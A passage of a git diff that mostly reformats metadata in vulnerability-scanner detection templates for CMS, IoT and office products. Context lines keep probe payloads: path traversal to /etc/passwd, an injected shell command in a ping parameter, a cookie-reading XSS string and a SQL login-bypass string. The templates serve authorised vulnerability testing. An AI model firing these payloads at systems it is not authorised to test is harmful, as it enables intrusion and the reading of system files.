max-request: 1 shodan-query: elastic indices - verified: true tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/empirecms-xss.yaml b/http/vulnerabilities/other/empirecms-xss.yaml index 13a7f908b2..a5b9b89ae9 100644 --- a/http/vulnerabilities/other/empirecms-xss.yaml +++ b/http/vulnerabilities/other/empirecms-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: empirecms,xss metadata: max-request: 1 + tags: empirecms,xss http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'onmousewheel=\"return bbimg(this)\"' diff --git a/http/vulnerabilities/other/ems-sqli.yaml b/http/vulnerabilities/other/ems-sqli.yaml index 543a002695..559bfa33da 100644 --- a/http/vulnerabilities/other/ems-sqli.yaml +++ b/http/vulnerabilities/other/ems-sqli.yaml @@ -11,11 +11,11 @@ info: - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 tags: ems,sqli,cms,auth-bypass,edb http: @@ -29,6 +29,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/eris-xss.yaml b/http/vulnerabilities/other/eris-xss.yaml index 0cf2b2d512..47b40dd461 100644 --- a/http/vulnerabilities/other/eris-xss.yaml +++ b/http/vulnerabilities/other/eris-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2022,xss,eris http: diff --git a/http/vulnerabilities/other/etouch-v2-sqli.yaml b/http/vulnerabilities/other/etouch-v2-sqli.yaml index ca7f5f0ec1..be54cb46da 100644 --- a/http/vulnerabilities/other/etouch-v2-sqli.yaml +++ b/http/vulnerabilities/other/etouch-v2-sqli.yaml @@ -10,12 +10,11 @@ info: - https://www.anquanke.com/post/id/168991 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: etouch,sqli metadata: max-request: 1 - + tags: etouch,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index 1337c9e8b3..f75bf64ea0 100644 --- a/http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: ewebs,lfi metadata: max-request: 1 + tags: ewebs,lfi http: - method: POST path: - '{{BaseURL}}/casmain.xgi' + headers: Content-Type: application/x-www-form-urlencoded diff --git a/http/vulnerabilities/other/eyelock-nano-lfd.yaml b/http/vulnerabilities/other/eyelock-nano-lfd.yaml index 618439c794..1983e14536 100644 --- a/http/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/http/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -4,13 +4,12 @@ info: name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high - description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This - can be exploited to disclose contents of files from local resources. + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt - tags: iot,lfi,eyelock metadata: max-request: 1 + tags: iot,lfi,eyelock http: - method: GET @@ -22,6 +21,7 @@ http: - type: status status: - 200 + - type: regex regex: - "root:[x*]:0:0:" diff --git a/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml b/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml index 89fa42813c..08224be737 100644 --- a/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml +++ b/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml @@ -7,9 +7,9 @@ info: description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - tags: oa,java,fanruan,disclosure metadata: max-request: 2 + tags: oa,java,fanruan,disclosure http: - method: GET @@ -36,4 +36,4 @@ http: - type: word words: - "application/json" - part: header \ No newline at end of file + part: header diff --git a/http/vulnerabilities/other/fatpipe-auth-bypass.yaml b/http/vulnerabilities/other/fatpipe-auth-bypass.yaml index c97094cddc..3148e40596 100644 --- a/http/vulnerabilities/other/fatpipe-auth-bypass.yaml +++ b/http/vulnerabilities/other/fatpipe-auth-bypass.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - https://www.fatpipeinc.com/support/advisories.php - tags: fatpipe,auth-bypass,router metadata: max-request: 1 + tags: fatpipe,auth-bypass,router http: - raw: diff --git a/http/vulnerabilities/other/fatpipe-backdoor.yaml b/http/vulnerabilities/other/fatpipe-backdoor.yaml index b13cbda861..9ac632265c 100644 --- a/http/vulnerabilities/other/fatpipe-backdoor.yaml +++ b/http/vulnerabilities/other/fatpipe-backdoor.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - https://www.fatpipeinc.com/support/advisories.php - tags: fatpipe,default-login,backdoor,auth-bypass metadata: max-request: 1 + tags: fatpipe,default-login,backdoor,auth-bypass http: - raw: diff --git a/http/vulnerabilities/other/feifeicms-lfr.yaml b/http/vulnerabilities/other/feifeicms-lfr.yaml index 8f615eabad..2608088fab 100644 --- a/http/vulnerabilities/other/feifeicms-lfr.yaml +++ b/http/vulnerabilities/other/feifeicms-lfr.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: feifeicms,lfi metadata: max-request: 1 + tags: feifeicms,lfi http: - method: GET diff --git a/http/vulnerabilities/other/finecms-sqli.yaml b/http/vulnerabilities/other/finecms-sqli.yaml index 1585d58993..1e9eda41b5 100644 --- a/http/vulnerabilities/other/finecms-sqli.yaml +++ b/http/vulnerabilities/other/finecms-sqli.yaml @@ -10,12 +10,11 @@ info: - https://blog.csdn.net/dfdhxb995397/article/details/101385340 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: finecms,sqli metadata: max-request: 1 - + tags: finecms,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/flatpress-xss.yaml b/http/vulnerabilities/other/flatpress-xss.yaml index b03846a14e..fc1c223d6f 100644 --- a/http/vulnerabilities/other/flatpress-xss.yaml +++ b/http/vulnerabilities/other/flatpress-xss.yaml @@ -13,10 +13,10 @@ info: cvss-score: 6.1 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"Flatpress" - tags: flatpress,xss,authenticated,oss + tags: flatpress,xss,authenticated,oss,intrusive http: - raw: @@ -38,12 +38,12 @@ http: Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - - | GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.cookie%29%22autofocus%3d%22 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/flir-ax8-rce.yaml b/http/vulnerabilities/other/flir-ax8-rce.yaml index be663d7652..1aee1fd2ac 100644 --- a/http/vulnerabilities/other/flir-ax8-rce.yaml +++ b/http/vulnerabilities/other/flir-ax8-rce.yaml @@ -10,11 +10,10 @@ info: - https://www.exploit-db.com/exploits/45602 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: app="FLIR-FLIR-AX8" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="FLIR-FLIR-AX8" tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated - variables: username: admin password: admin @@ -27,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded user_name={{username}}&user_password={{password}} - - | POST /res.php HTTP/1.1 Host: {{Hostname}} @@ -57,4 +55,4 @@ http: - type: regex part: body_2 regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' diff --git a/http/vulnerabilities/other/flir-path-traversal.yaml b/http/vulnerabilities/other/flir-path-traversal.yaml index 461477d551..37e72d9765 100644 --- a/http/vulnerabilities/other/flir-path-traversal.yaml +++ b/http/vulnerabilities/other/flir-path-traversal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: flir,lfi metadata: max-request: 1 + tags: flir,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 8e40b5780d..6e13389ef7 100644 --- a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: packetstorm,geowebserver,lfi metadata: max-request: 2 + tags: packetstorm,geowebserver,lfi http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: word words: - "bit app support" diff --git a/http/vulnerabilities/other/geovision-geowebserver-xss.yaml b/http/vulnerabilities/other/geovision-geowebserver-xss.yaml index bd5e410c90..9ef7f6268c 100644 --- a/http/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/http/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: geowebserver,xss,packetstorm metadata: max-request: 1 + tags: geowebserver,xss,packetstorm http: - raw: @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "" diff --git a/http/vulnerabilities/other/global-domains-lfi.yaml b/http/vulnerabilities/other/global-domains-lfi.yaml index ab844af7e9..3006ddcd98 100644 --- a/http/vulnerabilities/other/global-domains-lfi.yaml +++ b/http/vulnerabilities/other/global-domains-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: globaldomains,lfi,traversal metadata: max-request: 1 + tags: globaldomains,lfi,traversal http: - method: GET diff --git a/http/vulnerabilities/other/global-domains-xss.yaml b/http/vulnerabilities/other/global-domains-xss.yaml index fbfd4e5dad..dc4418f2b7 100644 --- a/http/vulnerabilities/other/global-domains-xss.yaml +++ b/http/vulnerabilities/other/global-domains-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: globaldomains,xss,packetstorm metadata: max-request: 1 + tags: globaldomains,xss,packetstorm http: - method: GET diff --git a/http/vulnerabilities/other/gloo-unauth.yaml b/http/vulnerabilities/other/gloo-unauth.yaml index fc050f9ae4..ed0c76c8c1 100644 --- a/http/vulnerabilities/other/gloo-unauth.yaml +++ b/http/vulnerabilities/other/gloo-unauth.yaml @@ -4,14 +4,15 @@ info: name: Unauthenticated Gloo UI author: dhiyaneshDk severity: high - tags: unauth,gloo metadata: max-request: 1 + tags: unauth,gloo http: - method: GET path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' + headers: Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index 47815bbf59..c096620684 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -15,9 +15,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 2 shodan-query: http.html:"GoAnywhere Managed File Transfer" - verified: true tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/goip-1-lfi.yaml b/http/vulnerabilities/other/goip-1-lfi.yaml index 0d7b22b441..a10f2681b8 100644 --- a/http/vulnerabilities/other/goip-1-lfi.yaml +++ b/http/vulnerabilities/other/goip-1-lfi.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: gsm,goip,lfi,iot metadata: max-request: 2 + tags: gsm,goip,lfi,iot http: - method: GET diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index d1f70a1013..eeebacdd78 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -15,9 +15,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"Graylog Web Interface" - verified: true tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/groupoffice-lfi.yaml b/http/vulnerabilities/other/groupoffice-lfi.yaml index 4cbafeeaea..362532e017 100644 --- a/http/vulnerabilities/other/groupoffice-lfi.yaml +++ b/http/vulnerabilities/other/groupoffice-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: groupoffice,lfi,traversal metadata: max-request: 1 + tags: groupoffice,lfi,traversal http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/gsoap-lfi.yaml b/http/vulnerabilities/other/gsoap-lfi.yaml index cc32f13d5f..9966cf3d80 100644 --- a/http/vulnerabilities/other/gsoap-lfi.yaml +++ b/http/vulnerabilities/other/gsoap-lfi.yaml @@ -3,17 +3,17 @@ id: gsoap-lfi info: name: gSOAP 2.8 - Local File Inclusion author: 0x_Akoko - description: gSOAP 2.8 is vulnerable to local file inclusion. severity: high + description: gSOAP 2.8 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/47653 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: edb,gsoap,lfi metadata: max-request: 1 + tags: edb,gsoap,lfi http: - raw: @@ -26,7 +26,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml index 26d9fa6d7e..2c55d953a8 100644 --- a/http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml @@ -10,11 +10,10 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml - https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: server="H3C-CVM" - tags: h3c,lfi,instrusive,file-upload - + tags: h3c,lfi,instrusive,file-upload,intrusive variables: filename: "{{rand_base(5)}}" payload: "{{rand_base(8)}}" @@ -28,7 +27,6 @@ http: Accept-Encoding: gzip, deflate {{payload}} - - | GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/h3c-imc-rce.yaml b/http/vulnerabilities/other/h3c-imc-rce.yaml index d770fbefe1..3bcee2396e 100644 --- a/http/vulnerabilities/other/h3c-imc-rce.yaml +++ b/http/vulnerabilities/other/h3c-imc-rce.yaml @@ -7,13 +7,13 @@ info: description: H3c IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint. reference: - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 metadata: max-request: 2 fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: rce,h3c-imc http: @@ -29,8 +29,8 @@ http: command: - 'cat /etc/passwd' - 'type C:\\Windows\\win.ini' - stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/other/hanming-lfr.yaml b/http/vulnerabilities/other/hanming-lfr.yaml index e36fe54f35..3afd0e6df6 100644 --- a/http/vulnerabilities/other/hanming-lfr.yaml +++ b/http/vulnerabilities/other/hanming-lfr.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfr,hanming,lfi metadata: max-request: 2 + tags: lfr,hanming,lfi http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/vulnerabilities/other/hanta-rce.yaml b/http/vulnerabilities/other/hanta-rce.yaml index fac8344cb0..9428a532a9 100644 --- a/http/vulnerabilities/other/hanta-rce.yaml +++ b/http/vulnerabilities/other/hanta-rce.yaml @@ -5,8 +5,8 @@ info: author: momika233 severity: high metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="汉塔科技上网行为管理系统" tags: hanta,rce,unauth diff --git a/http/vulnerabilities/other/hashicorp-consul-rce.yaml b/http/vulnerabilities/other/hashicorp-consul-rce.yaml index 4fbecb9077..33bc99da65 100644 --- a/http/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/http/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/46074 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: hashicorp,rce,oast,intrusive,edb metadata: max-request: 1 + tags: hashicorp,rce,oast,intrusive,edb http: - raw: diff --git a/http/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/http/vulnerabilities/other/hasura-graphql-psql-exec.yaml index b14c99092e..ad33b0506b 100644 --- a/http/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/http/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/49802 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: graphql,edb,hasura,rce metadata: max-request: 1 + tags: graphql,edb,hasura,rce http: - raw: diff --git a/http/vulnerabilities/other/hasura-graphql-ssrf.yaml b/http/vulnerabilities/other/hasura-graphql-ssrf.yaml index 92ce968ade..715434ed63 100644 --- a/http/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/http/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://cxsecurity.com/issue/WLB-2021040115 - tags: hasura,ssrf,graphql metadata: max-request: 1 + tags: hasura,ssrf,graphql http: - raw: diff --git a/http/vulnerabilities/other/hiboss-rce.yaml b/http/vulnerabilities/other/hiboss-rce.yaml index 4913135833..9be3a912ab 100644 --- a/http/vulnerabilities/other/hiboss-rce.yaml +++ b/http/vulnerabilities/other/hiboss-rce.yaml @@ -9,11 +9,11 @@ info: - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: hiboss,rce metadata: max-request: 2 + tags: hiboss,rce,intrusive http: - raw: @@ -21,7 +21,6 @@ http: GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{{randstr}}.txt&id=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/hikvision-isecure-center-rce.yaml b/http/vulnerabilities/other/hikvision-isecure-center-rce.yaml index 1984f2b918..63fc1b4626 100644 --- a/http/vulnerabilities/other/hikvision-isecure-center-rce.yaml +++ b/http/vulnerabilities/other/hikvision-isecure-center-rce.yaml @@ -10,8 +10,8 @@ info: - https://zhuanlan.zhihu.com/p/647590787 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="HIKVISION-综合安防管理平台" tags: hikvision,isecure,rce diff --git a/http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index cc84f3f1ac..f311c5f00c 100644 --- a/http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hjtcloud,lfi metadata: max-request: 2 + tags: hjtcloud,lfi http: - raw: @@ -24,7 +24,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fullPath=/etc/passwd - - | POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} @@ -35,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index 0650c6e175..cdf1b5fa4e 100644 --- a/http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml +++ b/http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hjtcloud,lfi metadata: max-request: 1 + tags: hjtcloud,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"name":' diff --git a/http/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/http/vulnerabilities/other/homeautomation-v3-openredirect.yaml index d4a2dcfc3b..71ee990608 100644 --- a/http/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/http/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: homeautomation,packetstorm,iot,redirect metadata: max-request: 1 + tags: homeautomation,packetstorm,iot,redirect http: - method: GET diff --git a/http/vulnerabilities/other/hongfan-ioffice-lfi.yaml b/http/vulnerabilities/other/hongfan-ioffice-lfi.yaml index e99a4521a2..07d3030d39 100644 --- a/http/vulnerabilities/other/hongfan-ioffice-lfi.yaml +++ b/http/vulnerabilities/other/hongfan-ioffice-lfi.yaml @@ -10,11 +10,10 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%BA%A2%E5%B8%86OA/%E7%BA%A2%E5%B8%86OA%20ioFileExport.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - https://github.com/qingchenhh/qc_poc/blob/main/Goby/ioffice_file_read.go metadata: + verified: true max-request: 1 fofa-query: app="红帆-ioffice" - verified: true tags: hongfan,lfi - variables: filename: "{{rand_base(5)}}" diff --git a/http/vulnerabilities/other/hongfan-ioffice-rce.yaml b/http/vulnerabilities/other/hongfan-ioffice-rce.yaml index 5c27a28d17..4a27c3fcd5 100644 --- a/http/vulnerabilities/other/hongfan-ioffice-rce.yaml +++ b/http/vulnerabilities/other/hongfan-ioffice-rce.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/FridaZhbk/pocscan/blob/main/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py metadata: - fofa-query: app="红帆-ioffice" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="红帆-ioffice" tags: hongfan,oa,sqli http: diff --git a/http/vulnerabilities/other/hongfan-ioffice-sqli.yaml b/http/vulnerabilities/other/hongfan-ioffice-sqli.yaml index 3126c66459..6fdeae4984 100644 --- a/http/vulnerabilities/other/hongfan-ioffice-sqli.yaml +++ b/http/vulnerabilities/other/hongfan-ioffice-sqli.yaml @@ -10,8 +10,8 @@ info: - https://github.com/lal0ne/vulnerability/blob/main/%E7%BA%A2%E5%B8%86OA/iOffice_sqlscan/sql.py - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%BA%A2%E5%B8%86%E5%8C%BB%E7%96%97%E4%BA%91%20OA%20udfmr.asmx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="红帆-ioffice" tags: hongfan,oa,sqli diff --git a/http/vulnerabilities/other/hospital-management-xss.yaml b/http/vulnerabilities/other/hospital-management-xss.yaml index 6b793db177..29f38e12c9 100644 --- a/http/vulnerabilities/other/hospital-management-xss.yaml +++ b/http/vulnerabilities/other/hospital-management-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"Hospital Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: hms,hospital,cms,xss,authenticated @@ -27,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit= - - | POST /hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml index 45e1f53db6..f495b9aa72 100644 --- a/http/vulnerabilities/other/hospital-management-xss2.yaml +++ b/http/vulnerabilities/other/hospital-management-xss2.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: 